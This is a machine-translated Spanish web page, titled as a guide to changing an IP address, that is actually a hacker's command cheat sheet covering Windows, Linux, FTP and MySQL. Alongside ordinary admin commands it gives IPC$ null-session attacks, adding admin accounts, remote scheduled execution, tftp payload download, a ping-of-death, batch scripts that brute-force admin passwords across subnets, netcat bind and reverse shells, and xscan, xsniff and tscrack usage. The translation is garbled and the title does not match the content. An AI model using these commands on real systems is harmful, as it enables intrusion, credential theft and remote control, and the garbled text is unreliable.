Red de conocimiento informático - Conocimiento del nombre de dominio - Cómo modificar la dirección IP a través de un archivo de texto

Cómo modificar la dirección IP a través de un archivo de texto

Le damos algunos comandos DOC básicos:

net use \\ip\ipc$ " " /user: " " Establezca un enlace IPC vacío

net use \\ip\ipc$ "Contraseña" /usuario: "Nombre de usuario" Establecer un enlace IPC no vacío

net use h: \\ip\c$ "Contraseña" /usuario: "Nombre de usuario" Inicie sesión directamente Luego asigne la otra parte C: al H local:

net use h: \\ip\c$ Después de iniciar sesión, asigne la otra parte C: al H local:

net use \\ip \ipc$ /del Eliminar enlace IPC

net use h: /del Eliminar la asignación de la otra parte al local H:

net usuario nombre de usuario contraseña/ agregar Crear usuario

p>

usuario de red invitado /activo: sí Activar usuario invitado

usuario de red Ver qué usuarios

nombre de cuenta de usuario de red Ver atributos de cuenta

net localgroup ***istrators nombre de usuario/add Agregue "usuario" al administrador para que tenga derechos de administrador. Nota: agregue s después de ***istrator para que sea plural

net start. Verifique cuáles están habilitados Servicio

net start nombre del servicio inicia el servicio (como: net start telnet, net start Schedule)

net stop nombre del servicio detiene un servicio

hora neta \ \ip de destino Verifique la hora de la otra parte

hora de red \\ip de destino /set Establezca la hora de la computadora local para sincronizarla con la hora del host "IP de destino". parámetro /yes para cancelar el mensaje de confirmación

net view Ver qué recursos compartidos de VPN están habilitados en la LAN local

net view \\ip Ver qué recursos compartidos de VPN están habilitados en la LAN de la otra parte

net config muestra la configuración de red del sistema

el cierre de sesión de red es el beneficio final de la desconexión

el nombre del servicio de pausa de red es pausar un servicio

net send ip "mensaje de texto" para enviar un mensaje a la otra parte

net ver Tipo de conexión de red e información que se utiliza actualmente en la LAN

net share Ver habilitado localmente ** * comparte

net share ipc$ Abrir ipc$* **disfruta

net share ipc$ /del eliminar ipc$***disfruta

net share c $ /del eliminar C:***enjoy

usuario de red invitado 12345 Después de iniciar sesión como usuario invitado, cambie la contraseña a 12345

contraseña de contraseña de red para cambiar la contraseña de inicio de sesión del sistema

netstat -a para comprobar qué puertos están abiertos, netstat -an de uso común

netstat -n Verifique el estado de conexión de red del puerto, netstat -an de uso común

netstat -v comprueba el trabajo en curso

netstat -p ejemplo de nombre de protocolo: netstat -p tcq/ip Comprueba el uso de un determinado protocolo (verifica el uso del protocolo tcp/ip)

netstat -s Comprueba el uso de todos los protocolos en uso

Existen condiciones de uso del protocolo

nbtstat -A ip Si uno de los puertos 136 a 139 de la otra parte está abierto, puede verificar el nombre de usuario del inicio de sesión reciente de la otra parte (el anterior a 03 es el nombre de usuario ) - Nota: Se requiere el parámetro -A Mayúsculas

tracert - parámetro ip (o nombre de computadora) ruta de seguimiento (paquete), parámetro: "-w número" se usa para establecer el intervalo de tiempo de espera.

Ping ip (o nombre de dominio) envía datos con un tamaño predeterminado de 32 bytes al otro host Parámetros: "-l [espacio] tamaño del paquete"; "-n número de veces para enviar datos" ; "-t "se refiere a hacer ping todo el tiempo.

ping -t -l 65550 ip ping of death (enviar archivos de más de 64K y hacer ping todo el tiempo se convierte en el ping de la muerte)

ipconfig (winipcfg) para Windows NT y XP (Windows 95 98) Para ver la dirección IP local, ipconfig puede usar el parámetro "/all" para mostrar toda la información de configuración

tlist -t muestra los procesos en una lista de líneas de árbol (es una herramienta adicional para el sistema y no se instala de forma predeterminada en la carpeta Soporte/herramientas del directorio de instalación)

kill -F Agregue el parámetro -F al nombre del proceso para forzar el final de un proceso (es un. herramienta adicional para el sistema, que no está instalada de forma predeterminada en el soporte de la carpeta /tools del directorio de instalación)

del -F Después de agregar el parámetro -F al nombre del archivo, puede eliminar la lectura. -archivo de solo lectura, /AH, /AS y /AA significan eliminar los archivos de solo lectura, ocultos y del sistema respectivamente, archivos de almacenamiento, /A-R, /A-H, /A-S, /A-A significan eliminar archivos. que no sean archivos de solo lectura, ocultos, del sistema y de archivo. Por ejemplo, "DEL/AR *.*" significa eliminar todos los archivos de solo lectura en el directorio actual, y "DEL/A-S *.*" significa eliminar todos los archivos en el directorio actual excepto los archivos del sistema

#2 2:

del /S /Q directorio o use: rmdir /s /Q directorio /S para eliminar el directorio y todos los subdirectorios y archivos bajo el directorio. Al mismo tiempo, use el parámetro /Q para cancelar la operación de eliminación y elimínela directamente después de que el sistema la confirme.

(Los dos comandos tienen el mismo efecto)

mover letra de unidad\ruta\nombre del archivo a mover ruta para almacenar el archivo movido\nombre del archivo después de mover para mover el archivo, use el parámetro /y para cancelar la confirmación de que existe el mismo archivo en el directorio movido. Si se le solicita, sobrescriba directamente

fc one.txt two.txt gt 3st.txt Compare los dos archivos y envíe las diferencias al archivo 3st.txt; , "gt; " y "gt; gt ;" es un comando de redirección

en el número de identificación inicia una tarea programada registrada

en /delete detiene todas las tareas programadas. parámetro /sí, se detendrá directamente sin confirmación

en el número de identificación/eliminar detiene una tarea programada registrada

en ver todas las tareas programadas

en \\. ip time nombre del programa (o un comando) /r Ejecute un determinado programa en el otro lado en un momento determinado y reinicie la computadora

finger nombre de usuario @host Compruebe qué usuarios han iniciado sesión recientemente

puerto ip telnet servidor remoto y de inicio de sesión, el puerto predeterminado es 23

open ip se conecta a IP (un comando después de iniciar sesión en telnet)

telnet Escriba telnet directamente en la máquina local para ingrese el telnet de la máquina local

copiar Ruta\Nombre de archivo 1 Ruta\Nombre de archivo 2 /y Copie el archivo 1 al directorio especificado como archivo 2. Utilice el parámetro /y para cancelar la confirmación de que desea sobrescribir un archivo de directorio existente

copiar c:\ srv.exe \\ip\***$ Copiar c:\srv.exe local al ***

cppy de la otra parte 1st.jpg/b 2st.txt/a 3st.jpg Cambie 2st. El contenido del txt está oculto en 1st.jpg para generar un nuevo archivo 3st.jpg Nota: El encabezado del archivo 2st.txt debe tener tres filas vacías. : /b se refiere al archivo binario, /a se refiere al archivo en formato ASCLL

copiar \\ip\***$\svv.exe c:\ o: copiar\\ip\*** $\*.* Copie el archivo srv.exe compartido por la otra parte ***i$*** (todos los archivos) al C local:

xcopy La dirección de destino del archivo o árbol de directorios a ser copiado\nombre del directorio para copiar el archivo y el árbol de directorios, use el parámetro /Y para sobrescribir el mismo archivo sin preguntar

tftp -i propia IP (use la IP de la máquina de carne cuando use la máquina de carne como trampolín) obtenga server.exe c:\server.exe Después de iniciar sesión, descargue el server.exe de "IP" al host de destino c:\server.exe Parámetros: -i significa transmitir en modo binario, como cuando se transmite exe si no se agrega -i, se transmitirá en modo ASCII (modo de transmisión de archivos de texto)

tftp -i La IP de la otra parte se coloca en c:\server. Después de iniciar sesión, cargue el archivo exe local. c:\server.exe al host

El puerto ftp ip se utiliza para cargar archivos al servidor o realizar operaciones con archivos. El puerto predeterminado es 21. bin se refiere a la transmisión en modo binario (entrada de archivo ejecutable); el valor predeterminado es la transmisión en formato ASCII (archivo de texto)

la impresión de ruta muestra la ruta IP, que mostrará principalmente la dirección de red, la dirección de red y la máscara de subred. Máscara de red, dirección de puerta de enlace Dirección de puerta de enlace, dirección de interfaz Interfaz

arp Ver y procesar el caché ARP ARP significa resolución de nombres y es responsable de analizar una IP en una dirección MAC física.

arp -a mostrará toda la información

nombre o comando del programa de inicio /max o /min para abrir una nueva ventana y maximizar (minimizar) ejecutar un programa o comando

mem Ver el uso de la CPU

nombre de archivo de atributo (nombre de directorio) Ver los atributos de un archivo (directorio)

nombre de archivo de atributo-A -R -S -H o A R S H eliminar (agregar) Archivar, leer -solo, sistema, atributos ocultos de un determinado archivo; use + para agregarlo como un determinado atributo

dir Ver archivos, parámetros: /Q muestra a qué usuario del sistema pertenecen los archivos y directorios, / T:C muestra la hora de creación del archivo, /T: A muestra la última vez que se accedió al archivo, /T: W hora de la última modificación

fecha /t, hora /t Utilice este parámetro, es decir, "FECHA/ T", " TIME/T" solo mostrará la fecha y hora actuales sin tener que ingresar una nueva fecha y hora

set Especifique el nombre de la variable de entorno = el carácter que se asignará a la variable Configure el entorno variable

set display Todas las variables de entorno actuales

set p (u otros caracteres) muestra todas las variables de entorno actuales comenzando con el carácter p (u otros caracteres)

pausa detiene el programa por lotes y muestra Salir: presione cualquier tecla para continuar....

si realiza un procesamiento condicional en un programa por lotes (consulte el comando y las variables para obtener más instrucciones)

La etiqueta Goto cmd.exe dirigirá a la línea etiquetada en el programa por lotes (la etiqueta debe ser una línea separada y comenzar con dos puntos, por ejemplo: etiqueta ":start")

ruta de llamada\ El nombre del archivo por lotes llama a otra línea del programa por lotes. Un programa de procesamiento por lotes (consulte llamar a /? para obtener más instrucciones)

para ejecuta un comando específico en cada archivo de un conjunto de archivos (consulte el comando y las variables para obtener más instrucciones)

eco activado o desactivado activa o desactiva el eco. El uso de eco solo sin parámetros mostrará la configuración de eco actual

la información del eco muestra información en la pantalla

.

echo information gt; gt; pass.txt Guarda "información" en el archivo pass.txt

findstr "Hello" aa.txt Encuentra la cadena hola en el archivo aa.txt

buscar Encuentra un determinado nombre de archivo Archivo

el nombre del título del título cambia el nombre del título de la ventana CMD

el valor del color del color establece el color de primer plano y de fondo de la consola cmd 0=negro; , 1=azul, 2=verde, 3=verde claro, 4=rojo, 5=morado, 6=amarillo, 7=blanco, 8=gris, 9=azul claro, A=verde claro, B=verde claro, C =rojo claro, D=lavanda, E= amarillo claro, F = blanco brillante

nombre del mensaje cambie el símbolo del sistema mostrado por cmd.exe (cambie C:\, D:\ a: EntSky\)

# 3 Tres:

ver muestra información de la versión en la ventana de DOS

winver abre una ventana para mostrar información de la versión (tamaño de la memoria, versión del sistema, versión del parche , nombre de la computadora)

formatear letra de unidad /FS: escriba formatear disco, escriba: FAT, FAT32, NTFS, ejemplo: Formato D: /FS: NTFS

md nombre del directorio a crear directorio

reemplazar archivo fuente para reemplazar el directorio del archivo para reemplazar el archivo

ren nombre de archivo original nuevo nombre de archivo cambiar el nombre del archivo

el árbol muestra el directorio en una estructura de árbol, use el parámetro -f para enumerar los primeros nombres de archivos en las carpetas

escriba los nombres de los archivos

Mostrar el contenido de un archivo de texto

más Nombre de archivo Mostrar el archivo de salida pantalla por pantalla

doskey Comando para bloquear = carácter

doskey Comando para desbloquear = proporcionado para DOS Bloquear comandos (editar la línea de comando, volver a invocar comandos de win2k y crear macros). Por ejemplo: comando lock dir: doskey dir=entsky (doskey dir=dir no se puede usar desbloquear: doskey dir=

taskmgr Abre el administrador de tareas

chkdsk /F D: Verifique el disco D y muestre el informe de estado; agregue el parámetro /f y corrija el error en el disco

tlntadmn telnt service admn, escriba tlntadmn y seleccione 3, luego seleccione 8, puede cambiar el valor predeterminado del servicio telnet. puerto 23 a cualquier otro puerto

salir sale del programa cmd.exe o del actual Utilice el parámetro /B para salir del script por lotes actual en lugar de cmd.exe

ruta\. El nombre del archivo ejecutable es ejecutable. El archivo establece una ruta.

cmd inicia una ventana de interpretación de comandos de win2K. Parámetros: /eff, /en desactivar y activar la expansión del comando; para obtener instrucciones más detalladas, consulte cmd /?

regedit /s El nombre del archivo de registro se importa al registro al que se refiere; importación en modo silencioso, sin ningún mensaje

regedit /e Nombre del archivo de registro exporta el registro

El parámetro de nombre de archivo cacls muestra o modifica la lista de control de acceso a archivos (ACL) - para NTFS; formato. Parámetros: /D nombre de usuario: configurado para denegar el acceso a un determinado usuario; /P nombre de usuario: permanente reemplaza los derechos de acceso del usuario especificado; /G nombre de usuario: permanente otorga derechos de acceso al usuario especificado. Puede ser: N ninguno, R; lee, W escribe, C cambia (escribe), F controla completamente, por ejemplo: cacls D:\test.txt /D pub establece d:\test.txt para denegar el acceso al usuario pub.

nombre de archivo cacls para ver la lista de permisos de usuario de acceso a archivos

Contenido de texto REM para agregar comentarios en el archivo por lotes

netsh para ver o cambiar la red local configuración

#4 Cuatro:

Comando de servicio IIS:

iisreset /reboot Reinicia la computadora win2k (pero aparece un mensaje solicitando que el sistema se reinicie)

iisreset /start o stop inicia (detiene) todos los servicios de Internet

iisreset /restart detiene y reinicia todos los servicios de Internet

iisreset /status muestra el estado de todos los servicios de Internet

iisreset /enable or enable Habilita (deshabilita) el reinicio del servicio de Internet en el sistema local

iisreset /rebootonerror Al iniciar, detener o reiniciar el servicio de Internet, si ocurre un error

>

iisreset /noforce Si no se puede detener el servicio de Internet, el servicio de Internet no se cancelará por la fuerza

iisreset /timeout Val no ha detenido el servicio de Internet cuando se excedió el tiempo (segundos ) se alcanza. Si se especifican los parámetros /rebootonerror, la computadora se reiniciará. El valor predeterminado es 20 segundos para reiniciar, 60 segundos para detener y 0 segundos para reiniciar.

Comando FTP: (los detalles se explican más adelante)

El formato de línea de comando de ftp es:

ftp -v -d -i -n -g[ nombre de host] -v muestra toda la información de respuesta del servidor remoto.

-d usa el modo de depuración.

-n restringe el inicio de sesión automático de ftp, es decir, no utiliza el archivo .netrc.

-g Cancela el nombre del archivo global.

ayuda [comando] o ? [Comando] Ver la descripción del comando

adiós o salir finaliza el proceso FTP del host y sale del modo de administración FTP

pwd enumera el directorio del host remoto actual

. poner o enviar el nombre del archivo local [nombre del archivo cargado en el host] para transferir un archivo local al host remoto

obtener o recibir [nombre del archivo del host remoto] [nombre del archivo descargado al local] desde Transferir un lote de archivos del host remoto al host local

mget [remote-files] Recibir un lote de archivos del host remoto al host local

mput local-files Transferir un lote de archivos al host local Transferir archivos al host remoto

dir o ls [directorio-remoto] [archivo-local] enumera los archivos en el directorio del host remoto actual. Si hay archivos locales, escriba. los resultados al archivo local

ascii Configurar para enviar archivos en modo ASCII (valor predeterminado)

bin o image Configurar para enviar archivos en modo binario

bell Cada vez que se completa una transferencia de archivos, el mensaje de alarma

cdup regresa al directorio anterior

cerrar interrumpe la sesión ftp con el servidor remoto (correspondiente a abrir)

abrir host[puerto] establece la conexión del servidor ftp especificado, puede especificar el puerto de conexión

delete elimina archivos en el host remoto

mdelete [remote-files] elimina un lote de files

mkdir nombre-directorio Crea un directorio en el host remoto

rename [from] [to] Cambia el nombre del archivo en el host remoto

directorio rmdir -name Eliminar el directorio en el host remoto

el estado muestra el estado actual de FTP

el sistema muestra el tipo de sistema del host remoto

usuario nombre de usuario [contraseña] [cuenta] Vuelva a iniciar sesión en el host remoto con otro nombre de usuario host

abrir host [puerto] restablecer una nueva conexión

modo de aviso interactivo

macdef define macro comando

lcd change El directorio de trabajo actual del host local Si es predeterminado, vaya al directorio HOME del usuario actual

chmod cambia los permisos de archivo del host remoto<. /p>

case Cuando esté activado, use el comando MGET Copie los nombres de los archivos a la máquina local y conviértalos todos a letras minúsculas

cd remote-dir ingresa al directorio del host remoto

cdup ingresa al directorio principal del directorio del host remoto

! Ejecute un shell interactivo en la máquina local y vuelva al entorno ftp, como!ls*.zip

#5 Cinco:

Comando MYSQL:

mysql -h dirección de host -u nombre de usuario -p contraseña para conectarse a MYSQL si se acaba de instalar MYSQL, el superusuario root; no tiene contraseña.

(Ejemplo: mysql -h110.110.110.110 -Uroot -P123456

Nota: u y root no necesitan agregar espacios, lo mismo aplica para los demás)

salir Salir de MYSQL

mysql*** -u nombre de usuario -p contraseña anterior contraseña nueva contraseña cambiar contraseña

conceder selección en la base de datos.* a nombre de usuario@inicio de sesión host identificado por \ "contraseña \"; Agregar nuevo usuario. (Nota: a diferencia de lo anterior, los siguientes son comandos en el entorno MYSQL, por lo que van seguidos de un punto y coma como terminador del comando)

mostrar bases de datos; Al principio solo existían dos bases de datos: mysql y test. La biblioteca mysql es muy importante. Contiene información del sistema MYSQL. Cuando cambiamos contraseñas y agregamos nuevos usuarios, en realidad usamos esta biblioteca para las operaciones.

usar mysql;

mostrar tablas; mostrar las tablas de datos en la biblioteca

describir el nombre de la tabla; p>crear nombre de base de datos; crear base de datos

usar nombre de base de datos

crear nombre de tabla de tabla (lista de configuración de campo

eliminar nombre de base de datos); ;

eliminar el nombre de la tabla; eliminar la base de datos y la tabla

eliminar del nombre de la tabla; borrar los registros en la tabla

seleccionar * del nombre de la tabla; datos en la tabla Registro

mysqldump --opt schoolgt; school.bbb Copia de seguridad de la base de datos: (El comando se ejecuta en el directorio \\mysql\\bin de DOS; Nota: Realice una copia de seguridad de la base de datos school en); el archivo school.bbb, school.bbb es un archivo de texto. Puede elegir cualquier nombre de archivo. Ábralo y encontrará nuevos descubrimientos.

Nuevos comandos bajo el sistema win2003 (parte práctica):

apagar /parámetro Apagar o reiniciar el host local o remoto.

Descripción del parámetro: /S apaga el host, /R reinicia el host, /T establece digitalmente el tiempo de retardo, que oscila entre 0 y 180 segundos, /A cancela el arranque, /M //IP especificada remota anfitrión.

Ejemplo: apagado /r /t 0 Reinicia el host local inmediatamente (sin demora)

taskill /parámetro nombre del proceso o pid del proceso Termina una o más tareas y procesos.

Descripción del parámetro: /PID es el pid del proceso a terminar. Puede usar el comando tasklist para obtener el pid de cada proceso, /IM es el nombre del proceso a terminar, /. F es terminar el proceso por la fuerza, /T es terminar el proceso especificado y el proceso hijo que inició.

La lista de tareas muestra los identificadores de proceso (PID) de procesos, servicios y procesos de servicio que se ejecutan actualmente en hosts locales y remotos.

Descripción del parámetro: /M enumera los archivos dll cargados por el proceso actual, /SVC muestra los servicios correspondientes a cada proceso y, sin parámetros, solo se enumera el proceso actual.

#6 Seis:

Comandos básicos en el sistema Linux: distingue entre mayúsculas y minúsculas

uname muestra información de la versión (igual que la versión win2K)

dir muestra los archivos en el directorio actual, ls -al muestra los archivos ocultos (igual que el directorio de win2K)

pwd consulta la ubicación del directorio actual

cd cd ..volver a la página anterior Capa directorio, tenga en cuenta que hay un espacio entre cd y... cd /regresar al directorio raíz.

nombre del archivo cat Ver el contenido del archivo

cat gt; abc.txt Escribir contenido en el archivo abc.txt.

más nombre de archivo Muestra un archivo de texto página por página.

cp copia archivos

mv mueve archivos

rm nombre de archivo elimina archivos, rm -a nombre de directorio elimina directorios y subdirectorios

mkdir nombre del directorio crea un directorio

rmdir elimina un subdirectorio y no hay documentos en el directorio.

chmod establece los permisos de acceso de archivos o directorios

grep busca cadenas en archivos

comparación de archivos diff

buscar búsqueda de archivos

fecha Fecha y hora actual

quién Consulta las personas que actualmente utilizan la misma máquina que usted y la hora y ubicación de inicio de sesión

w Consulta la información detallada de los usuarios actuales

whoami Ver el nombre de tu cuenta

grupos Ver el grupo de alguien

contraseña Cambiar contraseña

historial Ver tus propios comandos pasados

ps muestra el estado del proceso

kill detiene un proceso

gcc Los piratas informáticos suelen usarlo para compilar archivos escritos en lenguaje C

Sus permisos se convierten a usuarios designados

telnet IP telnet se conecta al otro host (igual que win2K). Cuando aparece bash$, la conexión es exitosa.

ftp ftp se conecta a un servidor (igual que win2K)

Adjunto: comandos por lotes y variables

1: Formato básico de comandos y variables:

FOR /variable de parámetro IN (establecer) DO comando [command_parameters] variable: especifique un parámetro que se pueda reemplazar por una sola letra, como: i, y use: i para especificar una variable, y use: i al llamar a una variable, variable Distingue entre mayúsculas y minúsculas (i no es igual a I).

Las variables que el procesamiento por lotes puede manejar cada vez varían de 0 a 9***10, de las cuales 0 es el nombre del archivo por lotes de forma predeterminada y 1 es el primer valor ingresado cuando se usa este lote. de la misma manera: 2-9 se refiere al valor ingresado del 2 al 9; ejemplo: net use \\ip\ipc$ pass /user: usuario donde ip es 1, pass es 2 y usuario es 3

(set): Especifique uno o un grupo de archivos, puede usar comodines, como: (D:\user.txt) y (1 1 254) (1 -1 254), { "(1 1 254) " el primer "1" se refiere al valor inicial, el segundo "1" se refiere a la cantidad de crecimiento y el tercero "254" se refiere al valor final, es decir: de 1 a 254; "(1 -1 254) " descripción: es decir, de 254 a 1 }

comando: especifique el comando que se ejecutará en el archivo, como: comando net use; si desea ejecutar varios comandos, agregue: amp; a sepárelos

command_parameters: especifique parámetros o interruptores de línea de comando para un comando específico

IN (set): se refiere a tomar el valor en (set DO command): se refiere a ejecutar el comando;

Parámetro: /L se refiere a Usar forma incremental {cuando (set) está en forma incremental}; /F significa recuperar valores continuamente del archivo hasta que se agote {cuando (set) es un archivo, como (d:\pass.txt)}.

Ejemplo de uso:

@echo off

formato de uso de eco: test.bat *.*.* test.txt

para /L G en (1 1 254) haga echo 1.G gt;gt;test.txt amp; net use \\1.G /user:***istrator | busque "Comando completado exitosamente" gt;gt;test .txt

Guardar como test.bat Descripción: Intente establecer una conexión IPC$ con una contraseña de ***istrator vacía para 254 IP en un segmento de red de clase C específico. Si tiene éxito, guarde la IP de prueba. .TXT.

/L se refiere a la forma incremental (es decir, de 1-254 o 254-1); los primeros tres dígitos de la IP de entrada: *.*.* es el 1 predeterminado para el procesamiento por lotes; una variable (ip El último dígito de amp; se usa para separar los dos comandos echo y net use | significa que después de crear ipc$, use buscar en los resultados para ver si hay un mensaje de "comando completado con éxito"; 1.G es la dirección IP completa (1 1 254) se refiere al valor inicial, la cantidad de crecimiento y el valor final.

@echo desactivado

formato de uso de eco: ok.bat ip

FOR /F i IN (D:\user.dic) DO smb.exe 1 i D:\pass.dic 200

Guardar como: ok.exe Descripción: Después de ingresar una IP, use el archivo de diccionario d:\pass.dic para descifrar la contraseña del usuario en d:\user.dic , hasta que se tomen todos los valores del archivo. i es el nombre de usuario; 1 es la dirección IP ingresada (predeterminada). /

#7 Siete:

2: Formato básico del comando if y las variables:

IF [not] declaración de comando numérico de nivel de error Si el programa se ejecuta y finalmente devuelve un valor igual o un código de salida mayor que el número especificado, la condición especificada es "verdadera".

Ejemplo: el comando IF errorlevel 0 significa que cuando el valor devuelto después de la ejecución del programa es 0, se ejecutará el comando después de la línea; IF not errorlevel 1 significa que el valor devuelto después de la ejecución del programa no es igual. a 1, entonces se ejecutará el siguiente comando.

0 significa que fue descubierto y ejecutado exitosamente (verdadero); 1 significa que no fue descubierto ni ejecutado (falso).

IF [not] Cadena 1==Cadena 2 Declaración de comando Si la cadena de texto especificada coincide (es decir: la Cadena 1 es igual a la Cadena 2), se ejecutará el siguiente comando.

Ejemplo: "if "2"=="4" goto start" significa: si la segunda variable ingresada es 4, ejecute el siguiente comando (nota: cuando llame a una variable, agregue el nombre de la variable a " ")

SI [no] existe nombre de archivo declaración de comando Si el nombre de archivo especificado existe, se ejecutarán los siguientes comandos.

Ejemplo: "si no nc.exe ir al final" significa: si no se encuentra el archivo nc.exe, salte a la etiqueta ":end".

IF [no] declaración de comando numérico de nivel de error else declaración de comando o IF [no] cadena 1==cadena 2 declaración de comando else declaración de comando o IF [no] existe nombre de archivo declaración de comando else declaración de comando más Arriba: Después de la declaración del comando else, se refiere a: cuando la condición anterior no es verdadera, se refiere al comando después de else. Nota: else debe estar en la misma línea que para ser válido.

Cuando hay un comando del, todo el contenido del comando del debe estar encerrado en lt; gt;, porque el comando del solo se puede ejecutar en una línea separada. Después de usar lt;, es equivalente a una línea separada. ; por ejemplo: "si existe test. txt. lt; del test.txt.gt; sino echo test.txt.missing", preste atención al "." en el comando

(2) Sistema Comandos externos (ambos requieren la descarga de herramientas relevantes):

p>

1 Navaja suiza: nc.exe

Descripción del parámetro:

-h. Ver información de ayuda

-d Modo en segundo plano

-e redirección del programa de programación, ejecutado una vez conectado [peligro]

-i intervalo de retraso de segundos

-l modo de escucha, utilizado para conexiones entrantes

-L modo de monitoreo, continúa monitoreando después de cerrar la conexión, hasta CTR C

-n dirección IP, el nombre de dominio no puede ser utilizado

-o registro de película 16 entradas Transmisión controlada

-p[espacio]puerto número de puerto local

-r puerto local y remoto aleatorio

-t usa el modo de interacción Telnet

-u modo UDP

-v salida detallada, usa -vv para ser más detallado

-w digital intervalo de retardo de tiempo de espera

-z ingresará, la salida se apagará (cuando se usa para barrido de anclas)

Uso básico:

nc -nvv 192.168.0.1 80 Conéctese al puerto 80 del host 192.168.0.1

nc -l -p 80 Abra el puerto TCP local 80 y escuche

nc -nvv -w2 -z 192.168.0.1 80 -1024 Barre los puertos 80-1024 de 192.168.0.1

nc -l -p 5354 -t -e c:winntsystem32cmd.exe Vincula el cmdshell del host remoto al puerto TCP 5354 remoto

nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 Bang Determine el cmdshell del host remoto y conéctese de manera inversa al puerto 5354 de 192.168.0.2

Uso avanzado:

nc -L -p 80 Usar como honeypot 1: habilitar y monitorear continuamente el puerto 80 hasta CTR C

nc -L -p 80 gt; c:\log.txt Usar 2 como honeypot: abra y escuche el puerto 80 continuamente hasta CTR C, y envíe los resultados al mismo tiempo Salida a c:\log.txt

nc -L -p 80 lt c:\honeyport.txt Utilice 3; -1 como honeypot: abre y monitorea el puerto 80 continuamente hasta CTR C, y envía el contenido en c:\honeyport.txt a la canalización, que también se puede usar para transferir archivos

type.exe c :\honeyport | nc -L -p 80 Use 3-2 como honeypot: abra y monitoree continuamente el puerto 80 hasta CTR C, y envíe el contenido en c:\honeyport.txt al canal, que también se puede usar para transferir. archivos

Usar en esta máquina: nc - l -p puerto local

Usar en el otro host: nc -e cmd.exe IP local -p puerto local *win2K

nc -e /bin/sh IP de la máquina local -p puerto local *linux, conexión inversa de Unix para atravesar a la otra parte

El firewall del host

Usar en la máquina local: nc -d -l -p local port lt; la ruta y el nombre del archivo a transferir

Usar en la otra máquina: nc -vv IP local Puerto local gt; Almacena la ruta y el nombre del archivo para transferir el archivo al otro host

Observaciones:

| Comando de canalización

lt; o gt; comando de redirección. "lt;", por ejemplo: tlntadmn lt; test.txt significa asignar el contenido de test.txt al comando tlntadmn

@ significa ejecutar el comando después de @, pero no se mostrará (ejecución en segundo plano). ); ejemplo :@dir c:\winnt gt;gt; d:\log.txt significa: ejecutar dir en segundo plano y almacenar el resultado en d:\log.txt

gt; gt; La diferencia "gt;" significa: sobrescribir; "gt; gt;" significa: guardar en (agregar a).

Por ejemplo: @dir c:\winnt gt; gt; d:\log.txt y @dir c:\winnt gt; d:\log.txt El uso de gt; gt; guarda el segundo resultado, mientras que el uso de: gt; solo tiene el primer resultado, porque el segundo resultado sobrescribe el primero.

#8 Ocho:

2. Herramienta de escaneo de anclaje: xscan.exe

Formato básico

xscan -host lt; ; lt; Elemento de detección gt; [Otras opciones] Escanee toda la información del host en el ancla "Nombre de archivo de la lista de IP del host"

Elemento de detección

-activo Compruebe si el host está activo<; /p>

-os detecta el tipo de sistema operativo remoto (a través de los protocolos NETBIOS y SNMP)

-port detecta el estado del puerto de los servicios más utilizados

-ftp detecta FTP débil contraseñas

p>

-pub Detecta permisos de escritura de usuarios anónimos del servicio FTP

-pop3 Detecta contraseñas débiles del servidor POP3

-smtp Detecta SMTP -Vulnerabilidades del servidor

-sql Detectar contraseñas débiles de SQL-Server

-smb Detectar contraseñas débiles de NT-Server

-iis Detectar vulnerabilidades de codificación/decodificación de IIS

-cgi Detectar vulnerabilidades CGI

-nasl Cargar script de ataque Nessus

-all Detectar todos los elementos anteriores

Otras opciones

-i El número de adaptador establece el adaptador de red, lt; el número de adaptador gt se puede obtener mediante el parámetro "-l"

-l muestra todos los adaptadores de red

-v muestra el progreso del análisis detallado

-p jump Pasar hosts que no responden

-o Saltar hosts sin puertos abiertos detectados

-t Número de subprocesos simultáneos, el número de hosts concurrentes especifica el número máximo de subprocesos simultáneos y el número de hosts simultáneos, la cantidad predeterminada es 100, 10

-nombre del archivo de registro especifica el nombre del archivo del informe de escaneo (sufijo: archivo en formato TXT o HTML)

Ejemplo de uso

xscan - host 192.168.1.1-192.168.255.255 -all -active -p Detecta todas las vulnerabilidades de los hosts en el segmento de red 192.168.1.1-192.168.255.255 y omite los que no responden hosts

xscan -host 192.168.1.1- 192.168.255.255 -port -smb -t 150 -o Detecta el estado del puerto estándar de los hosts en el segmento de red 192.168.1.1-192.168.255.255 Para NT débil. usuarios de contraseña, el número máximo de subprocesos simultáneos es 150. Se omiten los hosts sin puertos abiertos

xscan -file hostlist.txt -port -cgi -t 200, 5 -v -o detecta el puerto estándar. estado, vulnerabilidad CGI y subprocesos simultáneos máximos de todos los hosts enumerados en el archivo "hostlist.txt". El número es 200. Se puede detectar un máximo de 5 hosts al mismo tiempo. Se muestra el progreso de detección detallado. Hosts sin puertos abiertos. .jz5u.com se omiten

#9 Nueve:

3, rastreador de línea de comando: xsniff.exe

Puede capturar FTP/SMTP/POP3/HTTP. contraseñas de protocolo en la LAN

Descripción del parámetro

-datagrama TCP de salida tcp

-datagrama UDP de salida udp

-datagrama ICMP de salida icmp

-pasar filtra la información de la contraseña

-ocultar se ejecuta en segundo plano

-host resuelve el nombre del host

-addr dirección IP filtra la dirección IP

- puerto puerto filtro puerto

-nombre del archivo de registro guardar la salida en un archivo

-salida asc en formato ASCII

-salida hexadecimal en formato hexadecimal

Ejemplo de uso

xsniff.exe -pass -hide -log pass.log se ejecuta en segundo plano para detectar contraseñas y guardar información de contraseñas en el archivo pass.log

xsniff.exe -tcp -udp -asc -addr 192.168.1.1 husmea 192.168.1.1 y filtra la información de tcp y udp y la envía en formato ASCII

4. Descifrar contraseñas del servicio de terminal: tscrack.exe

Descripción del parámetro

-h Mostrar ayuda de uso

-v Mostrar versión